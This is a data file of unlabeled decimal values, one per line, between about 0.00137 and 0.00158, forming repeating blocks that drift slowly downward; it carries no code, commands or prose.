0.00154885
0.00154908
0.00155289
0.00155269
0.00154908
0.0015704
0.00157002
0.00156662
0.00156662
0.00157026
0.00157026
0.00156645
0.00155768
0.0015581
0.00156147
0.00156147
0.00155784
0.00156162
0.00155784
0.00157023
0.00157043
0.00156639
0.00156662
0.00157044
0.00157024
0.00156662
0.00157537
0.00157912
0.00157922
0.0015751
0.00157515
0.00157904
0.00157526
0.0015754
0.00157517
0.00157921
0.00157901
0.00157517
0.00157901
0.00157541
0.00157026
0.00156637
0.00157048
0.00156648
0.00157045
0.00157034
0.00156659
0.00157023
0.00157043
0.00156663
0.00156639
0.00157024
0.00157044
0.00156662
0.00157537
0.00157912
0.00157922
0.00157511
0.00157904
0.00157515
0.00157526
0.00157541
0.00157517
0.00157901
0.00157921
0.00157901
0.0015754
0.00157517
0.00157027
0.00156638
0.00157048
0.00156649
0.00157046
0.00156659
0.00157035
0.00155785
0.00156166
0.00156146
0.00155762
0.00156145
0.00155762
0.00155785
0.00155271
0.00154894
0.00155294
0.00154883
0.0015528
0.00155291
0.00154904
0.00155782
0.00156167
0.00156157
0.00155757
0.00155771
0.00156148
0.0015576
0.00155268
0.00155289
0.00154885
0.00154908
0.00155289
0.00155269
0.00154907
0.00155785
0.00156146
0.00156166
0.00155762
0.00156145
0.00155785
0.00155762
0.00155272
0.00154894
0.00155294
0.00154883
0.00155291
0.0015528
0.00154904
0.00155782
0.00156168
0.00156157
0.00155757
0.00156149
0.00155761
0.00155772
0.00155268
0.00155289
0.00154908
0.00154885
0.00155269
0.0015529
0.00154908
0.00157023
0.00157043
0.00156662
0.00156639
0.00157024
0.00157044
0.00156662
0.00157537
0.00157912
0.00157922
0.00157511
0.00157526
0.00157904
0.00157514
0.0015754
0.00157517
0.00157901
0.00157921
0.0015754
0.00157901
0.00157517
0.00157026
0.00156637
0.00157048
0.00156648
0.00157034
0.00157045
0.00156659
0.00155785
0.00156166
0.00156145
0.00155762
0.00156145
0.00155762
0.00155785
0.00155271
0.00154894
0.00155294
0.00154883
0.00154905
0.0015528
0.00155291
0.00155782
0.00156168
0.00156157
0.00155756
0.00156149
0.00155771
0.0015576
0.00155268
0.00155289
0.00154885
0.00154908
0.00154908
0.00155289
0.00155269
0.00155785
0.00156145
0.00156166
0.00155762
0.00156145
0.00155785
0.00155762
0.00155271
0.00154894
0.00155294
0.00154883
0.00155291
0.0015528
0.00154904
0.00155782
0.00156167
0.00156156
0.00155756
0.00156148
0.0015576
0.00155771
0.00155268
0.00155289
0.00154908
0.00154885
0.00155269
0.00155289
0.00154907
0.0015704
0.00157001
0.00156662
0.00156662
0.00157025
0.00157026
0.00156645
0.00155768
0.0015581
0.00156148
0.00156148
0.00155784
0.00156162
0.00155784
0.00157023
0.00157044
0.00156662
0.0015664
0.00157024
0.00157044
0.00156662
0.00157537
0.00157912
0.00157923
0.00157511
0.00157526
0.00157904
0.00157515
0.0015754
0.00157518
0.001579
0.00157921
0.0015754
0.00157901
0.00157517
0.00157026
0.00156637
0.00157048
0.00156648
0.00157034
0.00157045
0.00156659
0.00155785
0.00156146
0.00156166
0.00155763
0.00156145
0.00155785
0.00155762
0.00155272
0.00154894
0.00155294
0.00154883
0.00154905
0.0015528
0.00155291
0.00155782
0.00156168
0.00156157
0.00155757
0.00156149
0.00155771
0.0015576
0.00155268
0.00155289
0.00154908
0.00154885
0.00154908
0.00155269
0.00155289
0.00155785
0.00156146
0.00156166
0.00155763
0.00156145
0.00155785
0.00155762
0.00155271
0.00154894
0.00155294
0.00154883
0.00155291
0.0015528
0.00154904
0.00155782
0.00156168
0.00156157
0.00155756
0.00156149
0.0015576
0.00155771
0.00155268
0.00155289
0.00154908
0.00154885
0.00155269
0.00155289
0.00154908
0.00155767
0.00155809
0.00156147
0.00156147
0.00156162
0.00155784
0.00155784
0.00153531
0.00153492
0.00153153
0.00153152
0.00153136
0.00153516
0.00153516
0.00152259
0.001523
0.00152639
0.00152639
0.00152654
0.00152275
0.00152275
0.00153514
0.00153536
0.00153131
0.00153153
0.00153536
0.00153516
0.00153153
0.00154028
0.00154403
0.00154414
0.00154002
0.00154006
0.00154395
0.00154017
0.00154031
0.00154009
0.00154412
0.00154392
0.00154009
0.00154392
0.00154032
0.00153517
0.00153129
0.0015354
0.0015314
0.00153537
0.00153526
0.0015315
0.00153514
0.00153536
0.00153131
0.00153154
0.00153536
0.00153515
0.00153153
0.00154028
0.00154403
0.00154414
0.00154003
0.00154394
0.00154006
0.00154017
0.00154032
0.00154009
0.00154412
0.00154392
0.00154391
0.00154009
0.00154031
0.00153517
0.00153129
0.0015354
0.0015314
0.00153537
0.0015315
0.00153526
0.00152276
0.00152658
0.00152636
0.00152255
0.00152636
0.00152254
0.00152276
0.00151762
0.00151386
0.00151786
0.00151375
0.00151772
0.00151783
0.00151395
0.00152273
0.0015266
0.00152648
0.00152249
0.00152263
0.0015264
0.00152252
0.00151759
0.00151781
0.00151377
0.00151399
0.00151781
0.0015176
0.00151399
0.00152277
0.00152658
0.00152637
0.00152255
0.00152637
0.00152254
0.00152276
0.00151763
0.00151386
0.00151787
0.00151375
0.00151783
0.00151772
0.00151396
0.00152273
0.0015266
0.00152648
0.00152249
0.0015264
0.00152252
0.00152263
0.0015176
0.00151781
0.00151377
0.00151399
0.00151782
0.0015176
0.00151399
0.00153531
0.00153492
0.00153153
0.00153153
0.00153517
0.00153516
0.00153136
0.0015226
0.001523
0.00152639
0.00152639
0.00152276
0.00152655
0.00152276
0.00153514
0.00153535
0.00153131
0.00153153
0.00153535
0.00153515
0.00153153
0.00154027
0.00154403
0.00154414
0.00154003
0.00154006
0.00154394
0.00154017
0.00154031
0.00154009
0.00154412
0.00154391
0.00154008
0.00154391
0.00154031
0.00153517
0.00153129
0.0015354
0.0015314
0.00153537
0.00153526
0.00153149
0.00153514
0.00153535
0.00153153
0.00153131
0.00153515
0.00153536
0.00153153
0.00154027
0.00154403
0.00154414
0.00154002
0.00154394
0.00154006
0.00154017
0.00154031
0.00154009
0.00154391
0.00154412
0.00154391
0.00154031
0.00154008
0.00153517
0.00153129
0.0015354
0.0015314
0.00153537
0.0015315
0.00153526
0.00152276
0.00152657
0.00152636
0.00152254
0.00152636
0.00152254
0.00152276
0.00151762
0.00151386
0.00151786
0.00151375
0.00151771
0.00151783
0.00151395
0.00152273
0.00152659
0.00152648
0.00152248
0.00152263
0.0015264
0.00152252
0.00151759
0.00151781
0.00151377
0.00151399
0.00151781
0.0015176
0.00151398
0.00152276
0.00152636
0.00152658
0.00152254
0.00152636
0.00152276
0.00152254
0.00151763
0.00151386
0.00151786
0.00151375
0.00151783
0.00151771
0.00151395
0.00152273
0.00152659
0.00152648
0.00152249
0.0015264
0.00152252
0.00152263
0.00151759
0.00151781
0.00151399
0.00151377
0.0015176
0.00151781
0.00151399
0.00153514
0.00153535
0.00153153
0.00153131
0.00153515
0.00153535
0.00153153
0.00154028
0.00154403
0.00154414
0.00154002
0.00154017
0.00154394
0.00154006
0.00154031
0.00154009
0.00154392
0.00154412
0.00154031
0.00154391
0.00154008
0.00153517
0.0015313
0.0015354
0.0015314
0.00153526
0.00153537
0.0015315
0.00152276
0.00152658
0.00152637
0.00152255
0.00152637
0.00152254
0.00152276
0.00151763
0.00151386
0.00151787
0.00151376
0.00151396
0.00151772
0.00151784
0.00152273
0.0015266
0.00152649
0.00152249
0.0015264
0.00152263
0.00152253
0.0015176
0.00151781
0.00151378
0.001514
0.001514
0.00151782
0.00151761
0.00152277
0.00152637
0.00152658
0.00152255
0.00152637
0.00152276
0.00152255
0.00151763
0.00151387
0.00151787
0.00151376
0.00151784
0.00151773
0.00151396
0.00152274
0.0015266
0.00152649
0.00152249
0.0015264
0.00152253
0.00152263
0.0015176
0.00151782
0.001514
0.00151378
0.00151761
0.00151782
0.00151399
0.00153531
0.00153492
0.00153153
0.00153153
0.00153517
0.00153516
0.00153136
0.00152259
0.001523
0.00152639
0.00152639
0.00152275
0.00152654
0.00152275
0.00153514
0.00153535
0.00153153
0.00153131
0.00153515
0.00153535
0.00153153
0.00154027
0.00154402
0.00154414
0.00154002
0.00154017
0.00154394
0.00154006
0.00154031
0.00154009
0.00154392
0.00154412
0.00154031
0.00154391
0.00154008
0.00153517
0.00153129
0.0015354
0.0015314
0.00153526
0.00153537
0.0015315
0.00152276
0.00152637
0.00152657
0.00152254
0.00152636
0.00152275
0.00152254
0.00151763
0.00151386
0.00151786
0.00151375
0.00151396
0.00151772
0.00151783
0.00152273
0.00152659
0.00152648
0.00152249
0.00152639
0.00152263
0.00152252
0.0015176
0.00151781
0.001514
0.00151377
0.00151399
0.00151761
0.00151782
0.00152276
0.00152637
0.00152658
0.00152254
0.00152637
0.00152276
0.00152254
0.00151763
0.00151386
0.00151787
0.00151375
0.00151783
0.00151772
0.00151396
0.00152273
0.0015266
0.00152648
0.00152249
0.0015264
0.00152252
0.00152263
0.0015176
0.00151781
0.00151399
0.00151377
0.00151761
0.00151782
0.00151399
0.0015226
0.001523
0.00152638
0.00152639
0.00152654
0.00152275
0.00152275
0.00150023
0.00149983
0.00149644
0.00149644
0.00149628
0.00150008
0.00150008
0.00148751
0.00148791
0.0014913
0.0014913
0.00149146
0.00148767
0.00148767
0.00150006
0.00150027
0.00149623
0.00149645
0.00150028
0.00150006
0.00149645
0.00150519
0.00150894
0.00150906
0.00150495
0.00150498
0.00150885
0.00150509
0.00150522
0.00150501
0.00150904
0.00150882
0.001505
0.00150882
0.00150522
0.00150009
0.00149621
0.00150032
0.00149632
0.00150029
0.00150018
0.00149641
0.00150006
0.00150027
0.00149623
0.00149645
0.00150027
0.00150006
0.00149645
0.00150519
0.00150895
0.00150906
0.00150495
0.00150886
0.00150498
0.00150509
0.00150523
0.00150501
0.00150904
0.00150882
0.00150883
0.001505
0.00150522
0.00150009
0.00149621
0.00150032
0.00149632
0.00150029
0.00149642
0.00150018
0.00148768
0.0014915
0.00149128
0.00148746
0.00149128
0.00148746
0.00148767
0.00148255
0.00147878
0.00148278
0.00147867
0.00148264
0.00148275
0.00147887
0.00148765
0.00149152
0.0014914
0.00148741
0.00148755
0.00149131
0.00148744
0.00148251
0.00148273
0.00147869
0.00147891
0.00148273
0.00148252
0.0014789
0.00148768
0.0014915
0.00149128
0.00148746
0.00149128
0.00148746
0.00148767
0.00148255
0.00147878
0.00148278
0.00147867
0.00148275
0.00148263
0.00147888
0.00148765
0.00149152
0.0014914
0.0014874
0.00149132
0.00148744
0.00148755
0.00148251
0.00148273
0.00147869
0.00147891
0.00148273
0.00148252
0.00147891
0.00150023
0.00149983
0.00149645
0.00149645
0.00150008
0.00150008
0.00149629
0.00148752
0.00148792
0.00149131
0.00149131
0.00148768
0.00149147
0.00148768
0.00150005
0.00150027
0.00149623
0.00149645
0.00150027
0.00150006
0.00149644
0.00150519
0.00150894
0.00150906
0.00150494
0.00150498
0.00150886
0.00150509
0.00150522
0.00150501
0.00150904
0.00150882
0.001505
0.00150882
0.00150522
0.00150009
0.00149621
0.00150031
0.00149632
0.00150029
0.00150017
0.00149641
0.00150005
0.00150027
0.00149644
0.00149623
0.00150006
0.00150027
0.00149644
0.00150519
0.00150894
0.00150906
0.00150495
0.00150885
0.00150498
0.00150509
0.00150522
0.00150501
0.00150882
0.00150904
0.00150882
0.00150522
0.001505
0.00150008
0.00149621
0.00150032
0.00149632
0.00150029
0.00149641
0.00150017
0.00148768
0.0014915
0.00149128
0.00148746
0.00149128
0.00148746
0.00148767
0.00148255
0.00147878
0.00148278
0.00147867
0.00148264
0.00148275
0.00147887
0.00148765
0.00149151
0.0014914
0.0014874
0.00148755
0.00149131
0.00148744
0.00148251
0.00148273
0.00147869
0.00147891
0.00148273
0.00148252
0.0014789
0.00148768
0.00149128
0.0014915
0.00148747
0.00149127
0.00148767
0.00148746
0.00148255
0.00147878
0.00148278
0.00147867
0.00148275
0.00148264
0.00147887
0.00148765
0.00149152
0.0014914
0.00148741
0.00149131
0.00148744
0.00148755
0.00148251
0.00148273
0.00147891
0.00147869
0.00148252
0.00148273
0.00147891
0.00150006
0.00150028
0.00149645
0.00149624
0.00150006
0.00150028
0.00149645
0.00150519
0.00150895
0.00150907
0.00150495
0.00150509
0.00150886
0.00150499
0.00150523
0.00150502
0.00150883
0.00150905
0.00150523
0.00150883
0.00150501
0.00150009
0.00149622
0.00150033
0.00149632
0.00150018
0.0015003
0.00149642
0.00148769
0.00149151
0.00149128
0.00148747
0.00149129
0.00148747
0.00148768
0.00148255
0.00147878
0.00148279
0.00147868
0.00147888
0.00148264
0.00148276
0.00148766
0.00149153
0.00149141
0.00148741
0.00149133
0.00148756
0.00148745
0.00148251
0.00148274
0.0014787
0.00147892
0.00147891
0.00148275
0.00148252
0.00148768
0.00149128
0.0014915
0.00148747
0.00149128
0.00148768
0.00148746
0.00148255
0.00147878
0.00148278
0.00147868
0.00148276
0.00148264
0.00147888
0.00148765
0.00149152
0.00149141
0.00148741
0.00149132
0.00148745
0.00148755
0.00148251
0.00148274
0.00147891
0.0014787
0.00148252
0.00148274
0.00147891
0.00150023
0.00149983
0.00149644
0.00149644
0.00150008
0.00150008
0.00149628
0.00148751
0.00148791
0.0014913
0.0014913
0.00148767
0.00149146
0.00148767
0.00150005
0.00150027
0.00149644
0.00149623
0.00150006
0.00150027
0.00149645
0.00150519
0.00150895
0.00150906
0.00150495
0.00150509
0.00150886
0.00150498
0.00150522
0.00150501
0.00150882
0.00150904
0.00150522
0.00150882
0.001505
0.00150009
0.00149621
0.00150032
0.00149632
0.00150018
0.00150029
0.00149641
0.00148768
0.00149128
0.0014915
0.00148746
0.00149128
0.00148767
0.00148746
0.00148254
0.00147878
0.00148278
0.00147867
0.00147887
0.00148263
0.00148275
0.00148765
0.00149152
0.0014914
0.0014874
0.00149132
0.00148755
0.00148744
0.00148251
0.00148273
0.00147891
0.00147869
0.00147891
0.00148252
0.00148273
0.00148768
0.00149128
0.0014915
0.00148747
0.00149128
0.00148767
0.00148746
0.00148255
0.00147878
0.00148278
0.00147867
0.00148275
0.00148264
0.00147887
0.00148765
0.00149152
0.0014914
0.00148741
0.00149132
0.00148744
0.00148755
0.00148251
0.00148273
0.00147891
0.00147869
0.00148252
0.00148274
0.00147891
0.00148752
0.00148792
0.00149131
0.00149131
0.00149147
0.00148767
0.00148767
0.00146515
0.00146475
0.00146136
0.00146136
0.0014612
0.001465
0.001465
0.00145243
0.00145283
0.00145623
0.00145623
0.00145638
0.00145259
0.00145259
0.00146498
0.0014652
0.00146115
0.00146137
0.0014652
0.00146498
0.00146137
0.00147011
0.00147387
0.00147398
0.00146986
0.0014699
0.00147378
0.00147001
0.00147015
0.00146993
0.00147396
0.00147374
0.00146992
0.00147374
0.00147014
0.00146501
0.00146113
0.00146524
0.00146124
0.00146521
0.0014651
0.00146134
0.00146498
0.0014652
0.00146115
0.00146136
0.0014652
0.00146498
0.00146137
0.00147011
0.00147386
0.00147398
0.00146986
0.00147378
0.00146991
0.00147001
0.00147015
0.00146993
0.00147396
0.00147374
0.00147374
0.00146993
0.00147014
0.00146501
0.00146114
0.00146524
0.00146124
0.00146522
0.00146133
0.0014651
0.0014526
0.00145642
0.0014562
0.00145239
0.0014562
0.00145238
0.00145259
0.00144747
0.0014437
0.00144771
0.0014436
0.00144756
0.00144768
0.00144379
0.00145257
0.00145644
0.00145632
0.00145233
0.00145247
0.00145624
0.00145236
0.00144743
0.00144765
0.00144361
0.00144382
0.00144766
0.00144744
0.00144382
0.0014526
0.00145642
0.0014562
0.00145239
0.0014562
0.00145238
0.00145259
0.00144746
0.0014437
0.0014477
0.00144359
0.00144767
0.00144756
0.00144379
0.00145257
0.00145644
0.00145632
0.00145233
0.00145623
0.00145236
0.00145247
0.00144743
0.00144765
0.00144361
0.00144383
0.00144765
0.00144744
0.00144382
0.00146515
0.00146475
0.00146136
0.00146136
0.001465
0.001465
0.0014612
0.00145243
0.00145283
0.00145622
0.00145622
0.00145259
0.00145638
0.00145259
0.00146497
0.00146519
0.00146115
0.00146136
0.0014652
0.00146498
0.00146136
0.00147011
0.00147386
0.00147398
0.00146986
0.0014699
0.00147378
0.00147001
0.00147014
0.00146993
0.00147396
0.00147374
0.00146993
0.00147374
0.00147014
0.001465
0.00146114
0.00146524
0.00146124
0.00146521
0.0014651
0.00146133
0.00146497
0.00146519
0.00146136
0.00146115
0.00146498
0.00146519
0.00146136
0.00147011
0.00147386
0.00147398
0.00146986
0.00147377
0.0014699
0.00147001
0.00147014
0.00146993
0.00147374
0.00147396
0.00147374
0.00147014
0.00146992
0.001465
0.00146113
0.00146524
0.00146124
0.00146521
0.00146133
0.00146509
0.0014526
0.00145642
0.0014562
0.00145239
0.0014562
0.00145239
0.00145259
0.00144747
0.0014437
0.00144771
0.0014436
0.00144756
0.00144768
0.00144379
0.00145257
0.00145644
0.00145632
0.00145233
0.00145248
0.00145623
0.00145237
0.00144743
0.00144765
0.00144362
0.00144382
0.00144766
0.00144743
0.00144382
0.0014526
0.00145619
0.00145642
0.00145238
0.0014562
0.00145259
0.00145238
0.00144746
0.0014437
0.0014477
0.00144359
0.00144767
0.00144756
0.00144379
0.00145257
0.00145644
0.00145632
0.00145233
0.00145623
0.00145236
0.00145247
0.00144743
0.00144765
0.00144382
0.00144361
0.00144743
0.00144766
0.00144382
0.00146497
0.0014652
0.00146136
0.00146115
0.00146498
0.0014652
0.00146136
0.00147011
0.00147387
0.00147398
0.00146987
0.00147001
0.00147378
0.00146991
0.00147015
0.00146994
0.00147375
0.00147397
0.00147014
0.00147375
0.00146993
0.001465
0.00146113
0.00146525
0.00146124
0.0014651
0.00146521
0.00146133
0.0014526
0.00145642
0.0014562
0.00145238
0.0014562
0.00145238
0.00145259
0.00144746
0.0014437
0.0014477
0.00144359
0.00144379
0.00144756
0.00144767
0.00145257
0.00145644
0.00145632
0.00145233
0.00145623
0.00145247
0.00145236
0.00144743
0.00144765
0.00144361
0.00144383
0.00144383
0.00144765
0.00144744
0.0014526
0.0014562
0.00145642
0.00145238
0.0014562
0.00145259
0.00145238
0.00144746
0.0014437
0.0014477
0.00144359
0.00144767
0.00144756
0.00144379
0.00145256
0.00145644
0.00145632
0.00145233
0.00145623
0.00145236
0.00145246
0.00144743
0.00144765
0.00144383
0.00144361
0.00144744
0.00144765
0.00144382
0.00146515
0.00146475
0.00146136
0.00146136
0.001465
0.001465
0.0014612
0.00145243
0.00145283
0.00145622
0.00145622
0.00145259
0.00145638
0.00145259
0.00146497
0.00146519
0.00146136
0.00146115
0.00146497
0.00146519
0.00146136
0.00147011
0.00147386
0.00147398
0.00146986
0.00147001
0.00147378
0.0014699
0.00147014
0.00146993
0.00147374
0.00147396
0.00147013
0.00147375
0.00146992
0.001465
0.00146113
0.00146524
0.00146124
0.00146509
0.00146521
0.00146133
0.0014526
0.0014562
0.00145642
0.00145238
0.0014562
0.00145259
0.00145238
0.00144747
0.0014437
0.0014477
0.0014436
0.0014438
0.00144756
0.00144767
0.00145257
0.00145644
0.00145632
0.00145233
0.00145623
0.00145247
0.00145236
0.00144743
0.00144765
0.00144383
0.00144362
0.00144383
0.00144744
0.00144765
0.00145259
0.0014562
0.00145641
0.00145238
0.0014562
0.00145259
0.00145238
0.00144746
0.0014437
0.0014477
0.00144359
0.00144767
0.00144755
0.00144379
0.00145257
0.00145644
0.00145632
0.00145232
0.00145623
0.00145236
0.00145247
0.00144743
0.00144765
0.00144383
0.00144361
0.00144744
0.00144765
0.00144382
0.00145242
0.00145284
0.00145622
0.00145622
0.00145637
0.00145259
0.00145259
0.00143006
0.00142966
0.00142627
0.00142627
0.00142611
0.00142991
0.00142991
0.00141735
0.00141774
0.00142113
0.00142113
0.00142129
0.0014175
0.0014175
0.00142989
0.00143011
0.00142607
0.00142628
0.00143012
0.00142989
0.00142628
0.00143502
0.00143878
0.0014389
0.00143479
0.00143483
0.00143869
0.00143493
0.00143506
0.00143485
0.00143888
0.00143866
0.00143485
0.00143866
0.00143505
0.00142992
0.00142605
0.00143017
0.00142615
0.00143014
0.00143001
0.00142625
0.00142988
0.00143011
0.00142607
0.00142628
0.00143011
0.00142989
0.00142628
0.00143502
0.00143878
0.0014389
0.00143479
0.00143869
0.00143482
0.00143492
0.00143506
0.00143485
0.00143888
0.00143866
0.00143866
0.00143484
0.00143505
0.00142991
0.00142605
0.00143017
0.00142615
0.00143013
0.00142624
0.00143001
0.00141751
0.00142134
0.00142111
0.0014173
0.00142111
0.0014173
0.00141751
0.00141238
0.00140861
0.00141262
0.00140851
0.00141247
0.00141259
0.0014087
0.00141748
0.00142136
0.00142124
0.00141725
0.00141739
0.00142115
0.00141728
0.00141234
0.00141257
0.00140853
0.00140874
0.00141257
0.00141235
0.00140874
0.00141751
0.00142134
0.00142111
0.00141731
0.00142111
0.0014173
0.0014175
0.00141238
0.00140861
0.00141262
0.00140851
0.00141259
0.00141247
0.00140871
0.00141748
0.00142136
0.00142123
0.00141725
0.00142115
0.00141728
0.00141738
0.00141234
0.00141256
0.00140853
0.00140873
0.00141257
0.00141235
0.00140874
0.00143006
0.00142966
0.00142627
0.00142627
0.00142991
0.00142991
0.00142611
0.00141735
0.00141774
0.00142113
0.00142114
0.0014175
0.00142129
0.0014175
0.00142989
0.00143011
0.00142607
0.00142628
0.00143012
0.0014299
0.00142628
0.00143502
0.00143878
0.0014389
0.00143479
0.00143482
0.00143869
0.00143493
0.00143506
0.00143485
0.00143888
0.00143866
0.00143485
0.00143866
0.00143506
0.00142992
0.00142605
0.00143016
0.00142616
0.00143013
0.00143001
0.00142625
0.00142989
0.00143011
0.00142628
0.00142607
0.0014299
0.00143011
0.00142628
0.00143503
0.00143878
0.0014389
0.00143479
0.00143869
0.00143482
0.00143493
0.00143506
0.00143485
0.00143866
0.00143888
0.00143866
0.00143506
0.00143484
0.00142992
0.00142605
0.00143016
0.00142616
0.00143013
0.00142625
0.00143001
0.00141752
0.00142134
0.00142111
0.0014173
0.00142112
0.0014173
0.00141751
0.00141238
0.00140861
0.00141262
0.00140851
0.00141247
0.00141259
0.00140871
0.00141748
0.00142136
0.00142124
0.00141725
0.00141739
0.00142115
0.00141728
0.00141235
0.00141257
0.00140853
0.00140874
0.00141257
0.00141235
0.00140874
0.00141752
0.00142112
0.00142134
0.0014173
0.00142112
0.00141751
0.0014173
0.00141238
0.00140861
0.00141262
0.00140851
0.00141259
0.00141247
0.00140871
0.00141748
0.00142135
0.00142124
0.00141725
0.00142115
0.00141728
0.00141739
0.00141235
0.00141257
0.00140874
0.00140853
0.00141235
0.00141258
0.00140874
0.00142989
0.00143011
0.00142628
0.00142607
0.00142989
0.00143011
0.00142628
0.00143502
0.00143878
0.0014389
0.00143478
0.00143492
0.00143869
0.00143482
0.00143506
0.00143485
0.00143866
0.00143888
0.00143505
0.00143866
0.00143484
0.00142992
0.00142605
0.00143016
0.00142615
0.00143001
0.00143013
0.00142624
0.00141751
0.00142133
0.00142111
0.0014173
0.00142111
0.00141729
0.0014175
0.00141237
0.00140861
0.00141262
0.00140851
0.00140871
0.00141247
0.00141259
0.00141748
0.00142135
0.00142124
0.00141724
0.00142114
0.00141738
0.00141727
0.00141234
0.00141256
0.00140853
0.00140874
0.00140874
0.00141257
0.00141235
0.00141751
0.00142111
0.00142133
0.0014173
0.00142111
0.0014175
0.0014173
0.00141238
0.00140861
0.00141262
0.00140851
0.00141259
0.00141247
0.0014087
0.00141748
0.00142135
0.00142124
0.00141724
0.00142115
0.00141728
0.00141738
0.00141234
0.00141256
0.00140873
0.00140853
0.00141235
0.00141257
0.00140873
0.00143006
0.00142966
0.00142627
0.00142627
0.00142991
0.00142991
0.00142611
0.00141735
0.00141775
0.00142114
0.00142114
0.00141751
0.00142129
0.0014175
0.00142989
0.00143011
0.00142628
0.00142607
0.00142989
0.00143011
0.00142628
0.00143502
0.00143878
0.0014389
0.00143478
0.00143492
0.00143869
0.00143482
0.00143506
0.00143485
0.00143865
0.00143888
0.00143505
0.00143866
0.00143484
0.00142992
0.00142605
0.00143016
0.00142615
0.00143001
0.00143013
0.00142625
0.00141751
0.00142111
0.00142134
0.0014173
0.00142111
0.0014175
0.0014173
0.00141238
0.00140862
0.00141262
0.00140851
0.00140871
0.00141247
0.00141259
0.00141748
0.00142136
0.00142124
0.00141725
0.00142115
0.00141738
0.00141728
0.00141234
0.00141257
0.00140874
0.00140853
0.00140874
0.00141235
0.00141257
0.00141751
0.00142111
0.00142134
0.0014173
0.00142111
0.0014175
0.0014173
0.00141238
0.00140861
0.00141262
0.00140851
0.00141259
0.00141247
0.0014087
0.00141748
0.00142135
0.00142124
0.00141725
0.00142115
0.00141728
0.00141738
0.00141234
0.00141257
0.00140874
0.00140853
0.00141235
0.00141257
0.00140874
0.00141734
0.00141774
0.00142113
0.00142113
0.00142129
0.0014175
0.0014175
0.00139498
0.00139457
0.00139119
0.00139119
0.00139103
0.00139483
0.00139483
0.00138226
0.00138266
0.00138605
0.00138605
0.00138621
0.00138242
0.00138242
0.00139481
0.00139503
0.00139099
0.00139119
0.00139503
0.00139481
0.0013912
0.00139994
0.0014037
0.00140382
0.0013997
0.00139974
0.00140361
0.00139984
0.00139998
0.00139976
0.0014038
0.00140357
0.00139976
0.00140357
0.00139997
0.00139484
0.00139097
0.00139508
0.00139107
0.00139505
0.00139493
0.00139117
0.0013948
0.00139503
0.00139098
0.0013912
0.00139503
0.00139481
0.00139119
0.00139994
0.0014037
0.00140382
0.0013997
0.00140361
0.00139974
0.00139984
0.00139997
0.00139976
0.0014038
0.00140357
0.00140357
0.00139976
0.00139997
0.00139484
0.00139097
0.00139508
0.00139107
0.00139505
0.00139116
0.00139493
0.00138243
0.00138625
0.00138603
0.00138222
0.00138603
0.00138222
0.00138242
0.0013773
0.00137353
0.00137754
0.00137343
0.00137739
0.00137751
0.00137362
0.0013824
0.00138627
0.00138616
0.00138217
0.0013823
0.00138607
0.0013822
0.00137726
0.00137749
0.00137345
0.00137366
0.00137749
0.00137727
0.00137366
0.00138243
0.00138625
0.00138603
0.00138222
0.00138603
0.00138222
0.00138242
0.0013773
0.00137353
0.00137754
0.00137343
0.00137751
0.00137739
0.00137363
0.0013824
0.00138628
0.00138616
0.00138217
0.00138607
0.0013822
0.00138231
0.00137726
0.00137749
0.00137345
0.00137366
0.00137749
0.00137727
0.00137366
0.00139498
0.00139457
0.00139119
0.00139119
0.00139482
0.00139482
0.00139103
0.00138227
0.00138266
0.00138605
0.00138605
0.00138242
0.00138621
0.00138242
0.0013948
0.00139503
0.00139098
0.00139119
0.00139503
0.00139481
0.00139119
0.00139994
0.0014037
0.00140382
0.0013997
0.00139974
0.00140361
0.00139984
0.00139998
0.00139976
0.0014038
0.00140357
0.00139976
0.00140358
0.00139997
0.00139483
0.00139097
0.00139508
0.00139107
0.00139505
0.00139493
0.00139116
0.0013948
0.00139503
0.00139119
0.00139098
0.00139481
0.00139503
0.00139119
0.00139994
0.0014037
0.00140382
0.0013997
0.00140361
0.00139974
0.00139984
0.00139998
0.00139976
0.00140357
0.00140379
0.00140357
0.00139997
0.00139976
0.00139483
0.00139097
0.00139508
0.00139107
0.00139505
0.00139116
0.00139493
0.00138243
0.00138625
0.00138602
0.00138222
0.00138603
0.00138221
0.00138242
0.0013773
0.00137353
0.00137754
0.00137343
0.00137739
0.00137751
0.00137363
0.0013824
0.00138627
0.00138615
0.00138216
0.0013823
0.00138606
0.0013822
0.00137726
0.00137749
0.00137345
0.00137366
0.00137749
0.00137727
0.00137366
0.00138243
0.00138602
0.00138625
0.00138222
0.00138603
0.00138242
0.00138221
0.0013773
0.00137353
0.00137753
0.00137343
0.00137751
0.00137739
0.00137363
0.0013824
0.00138627
0.00138616
0.00138216
0.00138607
0.0013822
0.0013823
0.00137726
0.00137749
0.00137366
0.00137345
0.00137727
0.00137749
0.00137366
0.0013948
0.00139502
0.00139119
0.00139099
0.00139481
0.00139503
0.0013912
0.00139994
0.0014037
0.00140381
0.0013997
0.00139984
0.0014036
0.00139974
0.00139997
0.00139976
0.00140357
0.00140379
0.00139997
0.00140357
0.00139976
0.00139484
0.00139097
0.00139508
0.00139107
0.00139493
0.00139505
0.00139116
0.00138243
0.00138625
0.00138603
0.00138222
0.00138603
0.00138221
0.00138242
0.0013773
0.00137354
0.00137754
0.00137343
0.00137363
0.00137739
0.00137751
0.0013824
0.00138627
0.00138616
0.00138216
0.00138607
0.0013823
0.0013822
0.00137727
0.00137749
0.00137345
0.00137367
0.00137367
0.00137749
0.00137727
0.00138244
0.00138603
0.00138626
0.00138222
0.00138604
0.00138243
0.00138222
0.0013773
0.00137354
0.00137755
0.00137343
0.00137751
0.0013774
0.00137363
0.0013824
0.00138628
0.00138616
0.00138217
0.00138607
0.0013822
0.00138231
0.00137727
0.00137749
0.00137366
0.00137345
0.00137727
0.0013775
0.00137366
0.00139498
0.00139457
0.00139119
0.00139119
0.00139482
0.00139482
0.00139103
0.00138226
0.00138266
0.00138605
0.00138605
0.00138242
0.00138621
0.00138242
0.00139481
0.00139503
0.0013912
0.00139099
0.00139481
0.00139503
0.0013912
0.00139994
0.0014037
0.00140382
0.0013997
0.00139984
0.00140361
0.00139974
0.00139998
0.00139977
0.00140358
0.0014038
0.00139997
0.00140358
0.00139976
0.00139484
0.00139097
0.00139508
0.00139108
0.00139493
0.00139505
0.00139117
0.00138243
0.00138604
0.00138626
0.00138222
0.00138604
0.00138242
0.00138222
0.0013773
0.00137354
0.00137754
0.00137343
0.00137363
0.00137739
0.00137751
0.0013824
0.00138628
0.00138616
0.00138217
0.00138607
0.0013823
0.0013822
0.00137726
0.00137749
0.00137367
0.00137346
0.00137367
0.00137727
0.0013775
0.00138243
0.00138604
0.00138626
0.00138222
0.00138603
0.00138243
0.00138222
0.0013773
0.00137354
0.00137754
0.00137343
0.00137751
0.0013774
0.00137363
